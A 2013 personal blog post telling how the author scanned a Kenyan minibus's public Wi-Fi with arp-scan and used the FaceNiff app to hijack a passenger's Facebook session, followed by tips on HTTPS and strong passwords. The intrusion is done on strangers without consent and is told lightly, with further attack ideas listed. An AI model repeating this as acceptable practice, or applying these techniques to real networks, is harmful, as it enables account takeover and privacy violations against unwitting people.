Monday, July 15, 2013

Hey Free Wi-Fi ... the matatu hacking Syndrome

Everything has a price... heck even the free tools i know including our brains pay a price by need of knowledge and so on and so forth... what am i getting at... in Kenya i got a chance to ride in one of the Wi-Fi enabled PSVs Public Service Vehicles... the hacker in me... did not want to hate on a lot of this issues but hey the pentester in me likes to create awareness so ... with the whole country going digital and being stuck in traffic for a little over 45 minutes i decided to give this beautiful tech savvy mode of transport a pentest :) (really i should get paid)

Coming of as a very lucrative and empowering initiative (thats going to give them a lot of revenue ) by the safaricom network one of Kenya's major Network (mobile and data) providers   an initiative dubbed the vumaonline is an initiative to equip most (if not all) PSVs with wireless data capability where customers will admire and adore using the internet on this vehicles at no extra cost to them .

well without further a do ... the first thing is i made sure my window was shut tight beyond the point of no robber slide and smiled at my besty Diana as she knew ... this nikka is up to no good (thats what she actually said) then pulled out my little Talia (Asus 11.3 inch laptop) and booted up my little default pentest environment .... my trusted and heavily customised Backtrack linux ...
plugin in my external usb wireless card (capable of injection i might add).

and we were on.... first thing was to connect to the Wi-Fi which had a pathetic key i may add (the number plate e.g KBC_567D) so even the guy trailing the vehicle might get a glimpse of the network ( not that i tested i assumed---which is wrong :( but hey at that range i believe its possible) and when i connected first thing i did.... the near obvious... enumerate all the users on the network by scanning the whole IP range... so what do we get: in a quick instance

and here is my command

arp-scan --interface=wlan1 --localnet
this gives me various IP addresses and  MAC addresses which resolving them (MAC addresses) to their vendor/manufacturer ID using this gives me something close to this

3 Samsung devices
3 Huawei devices
1 Blackberry device

good we are going somewhere .... with this i can go on :)
oww yes the Wi-Fi was well protected with WPA-PSK so no hackers allowed :)  while thats really cute the password still irks me...

moving on i wanted to try out an MiTM attack (Man in The Middle)  ...but hey too bad i will have to confess that i actually gave up due to the time constraint...(with the above information not much damage was done but if given time i would probably have done tonnes more like own your phone,redirect web logins to phishing sites, steal credentials, install malware (sooner or later via initiating downloads of malicious apks in case of android phones that would tap your messages and probably see how much MPESA transactions u see/do in a day or given time) ) i had but, more fun and pentest would still suffice what i did is pull out my Samsung galaxy tab plus and waged a little more interesting attack method :) hacking facebook (thats all i could see when peeping over their shoulders .....FACEBOOK and well twitter and a little what's up on one of the passengers phone.... so here goes nothing.

So a simple app called (well not really simple) FaceNiff entered the software/app market recently with the ability to hack facebook accounts... with a simple method,
FaceNiff is an Android app that allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to.
It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks (Open/WEP/WPA-PSK/WPA2-PSK)
It's kind of like Firesheep for android. Maybe a bit easier to use (and it works on WPA2!).

*** ROOTED PHONE *** is required. Please note that if webuser uses SSL this application won't work.
This application due to its nature is very phone-dependant so please let me know if it won't work for You

Use with stock browser (might not work with other)

well moving in on the kill we get one user with a none protected facebook account... well how does this work?

we connect to the Wi-Fi , using your regular wi-fi settings.
start the application,

you can also choose which accounts to attack
also you can do auto locating of profiles that match your preference and also do a MAC to vendor resolve

and with that we got the accounts as above.... what is the dangers of this
as i have asserted on previous notes and research most people use default and/or same passwords in accounts so... is it hard that your company email is protected by the same password? your online bank account? what of your laptop/computer password? well its just a matter of time till a malicious hacker /information gatherer finds that and you are done for.

P.S the above application does not require you to be tech savvy or a hacker per say but hey :)

so how do we/I fix this first recommendation ....
-Encrypt your network see SSL i warned people about it earlier 
heres how on facebook---->

1.  Click on the Account tab.
2.  Choose Account Settings.
3.  Click Change next to Account Security.
How to Protect Your Facebook Profile: 10 Ways to Increase Privacy
4. Check the box for Secure Browsing (https). Click Save.
How to Protect Your Facebook Profile: 10 Ways to Increase Privacy
NOTE: Whenever you use a Facebook page or third-party app that takes you out of secure browsing, and you allow it, it will disable it completely and you'll have to go back and reset your preferences. Don't assume it will automatically switch back.
When in Account Security, you can also change settings for Login Approvals and Login Notifications and check your recent Login Activity.
and with that follow the procedure to other sites like google,gmail,youtube,amazon,itunes e.t.c

owww please use more than one strong passwords on different sites read about how to create strong passwords here

in the meantime surf safe :) good day owww and yes i did warn the beautiful lady who i owned her account... she bought me coffee today :)


:) No longer posting, all articles should be treated as archived and outdated